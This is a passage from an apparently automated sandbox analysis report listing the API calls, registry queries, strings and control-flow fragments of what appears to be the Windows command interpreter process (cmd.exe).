39->41 47 189e3-189f1 GetConsoleTitleW 40->47 48 189fd-18a03 40->48 43 18945 41->43 44 18947-18951 41->44 43->44 44->40 46 18953-1895a 44->46 46->40 49 1895c-1895e 46->49 47->48 50 189f3-189fa 47->50 51 18a51-18a57 48->51 52 18a05-18a0f call 19a11 48->52 53 18960 49->53 54 18962-18979 call 178e4 49->54 50->48 55 18a59-18a8b call 370d6 call 14d08 call 163bd call 19950 51->55 56 18abb-18b08 GetModuleHandleW GetProcAddress * 3 51->56 52->51 67 18a11-18a1b 52->67 53->54 68 18980-1898f GetWindowsDirectoryW 54->68 69 1897b 54->69 87 18aa7-18ab0 call 178e4 55->87 88 18a8d-18aa5 call 19950 * 2 55->88 60 18b14-18b16 56->60 61 18b0a-18b0d 56->61 66 18b17-18b28 free call 26b30 60->66 61->60 65 18b0f-18b12 61->65 65->60 65->66 79 18b2d-18b2e 66->79 73 18a1d-18a32 GetStdHandle 
GetConsoleScreenBufferInfo 67->73 74 18a4c call 38496 67->74 68->20 70 18995-1899d 68->70 69->68 75 189a4-189a6 call 18bc7 70->75 76 1899f 70->76 80 18a40-18a4a 73->80 81 18a34-18a3e 73->81 74->51 75->40 76->75 80->51 80->74 81->51 94 18ab1-18ab5 GlobalFree 87->94 88->94 94->56
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0004CA04), ref: 000187EE
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000187FA
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0001880E
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00037460,00000001), ref: 0001881B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00018828
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00018830
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001883C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00018844
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E318
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: SetConsoleMode.KERNELBASE(00000000), ref: 0001E322
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E32F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: GetConsoleMode.KERNELBASE(00000000), ref: 0001E339
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E35E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: GetConsoleMode.KERNELBASE(00000000), ref: 0001E368
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E390
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: SetConsoleMode.KERNELBASE(00000000), ref: 0001E39A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0001A9C5), ref: 0001A9D8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0001A9F3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0001A9FA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0001AA09
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0001AA12
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0001885E), ref: 00018B9D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001885E), ref: 00018BA4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000182D3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00018313
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0001834D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0001839D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000183D7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0001886A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000188A5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00018987
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 000189AB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 000189BC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,0004C9E0,00000008), ref: 0001859E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000185BC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00018614
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00018653
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0004C9D0,00000008), ref: 0001867D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0004C970,00000020), ref: 00018698
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0004C930,00000020), ref: 000186B0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 000189CD
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 000189D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 000189E9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00018A23
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00018A2A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00018AB5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00018AC0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00018AD1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00018AE7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00018AF8
                                                                                                                                                                                                                                                                                                                                                                                                                          • free.MSVCRT(?), ref: 00018B18
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3313898297-3021193919
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0710b4d5de879887a8bc1b9493c0d7b4d3f7147b0695709630894b2b3dfd2d43
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1d5e8605da0560b314baa7bd58955a6a1daef1c24971ded29c33f482cca9598
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0710b4d5de879887a8bc1b9493c0d7b4d3f7147b0695709630894b2b3dfd2d43
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4091E7B17007009BFB14ABA4ED5AAEF37B9EF45701B048119F606DB1A2DF7899C1CB16

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000182D3
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00018313
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0001834D
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0001839D
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000183D7
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00018427
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00018498
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00018526
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0001853A
                                                                                                                                                                                                                                                                                                                                                                                                                          • time.MSVCRT(00000000), ref: 00018554
                                                                                                                                                                                                                                                                                                                                                                                                                          • srand.MSVCRT ref: 0001855B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 145004033-3846321370
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c2c5a83a475b64523d7abd91d59f18e190d038f2e3920c29e03be0ec43b7dd2c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cc1eed242024161e0a4b59c6b80abf99506be2bb0339af34abac5d59eb743eca
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2c5a83a475b64523d7abd91d59f18e190d038f2e3920c29e03be0ec43b7dd2c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3C1A5359002A9EAEF328B50DD05BDA77B8FB19702F1081D6E689E2190DBB45FC8CF55

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000209CB
                                                                                                                                                                                                                                                                                                                                                                                                                          • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 000209D8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E2AF: SetThreadUILanguage.KERNELBASE ref: 0001E2C6
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 000209ED
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00020A0A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 00020A72
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE ref: 00020AA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 00020AB4
                                                                                                                                                                                                                                                                                                                                                                                                                          • exit.KERNELBASE ref: 00020ADA
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 0002E9E1
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 0002E9EA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,0002EF7C,?,00000000,00000000), ref: 00021FB2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,0002EF7C,?,00000000,00000000), ref: 00021FCE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F1A: GetConsoleOutputCP.KERNELBASE(00020A41), ref: 00021F1A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 00021F2B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F1A: memset.MSVCRT ref: 00021F45
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0004CA04), ref: 000187EE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000187FA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0001880E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00037460,00000001), ref: 0001881B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: _get_osfhandle.MSVCRT ref: 00018828
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetConsoleMode.KERNELBASE(00000000), ref: 00018830
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: _get_osfhandle.MSVCRT ref: 0001883C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetConsoleMode.KERNELBASE(00000000), ref: 00018844
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0001886A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000188A5
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 0002EA5E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • DisableCMD, xrefs: 0002E9D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Software\Policies\Microsoft\Windows\System, xrefs: 00020A00
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002011A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00020156
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0003E590,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC77
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC8D
  • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECA3
  • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECB9
  • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECCF
  • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECE5
  • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECF7
  • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ED0D
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 000201DB
• exit.MSVCRT ref: 0002E621
• _wcsupr.MSVCRT ref: 0002E683
• _wcsicmp.MSVCRT ref: 0002E71A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
• String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE

APIs
  • Part of subcall function 00025A2E: memset.MSVCRT ref: 00025A5A
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000,?,00000104,?), ref: 00018C7A
• towupper.MSVCRT ref: 00018C8F
• iswalpha.MSVCRT ref: 00018CA4
• towupper.MSVCRT ref: 00018CC4
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00018CF0
• GetFileAttributesW.KERNELBASE(?), ref: 00018D93
• GetFileAttributesW.KERNELBASE(?), ref: 00018DE0
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00018E11
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0002B6AB
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
• String ID:

APIs
• _get_osfhandle.MSVCRT ref: 0001E318
• SetConsoleMode.KERNELBASE(00000000), ref: 0001E322
• _get_osfhandle.MSVCRT ref: 0001E32F
• GetConsoleMode.KERNELBASE(00000000), ref: 0001E339
• _get_osfhandle.MSVCRT ref: 0001E35E
• GetConsoleMode.KERNELBASE(00000000), ref: 0001E368
• _get_osfhandle.MSVCRT ref: 0001E390
• SetConsoleMode.KERNELBASE(00000000), ref: 0001E39A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E3C7
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0001E3D1
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0002DC35
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0002DC3F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-3025314500

Control-flow Graph
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00015A10
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00015A53
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00015A70
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00015A87
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00020B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00020B40
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00015AA1
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00015B09
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00015B13
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00015B70
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00029B7C
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
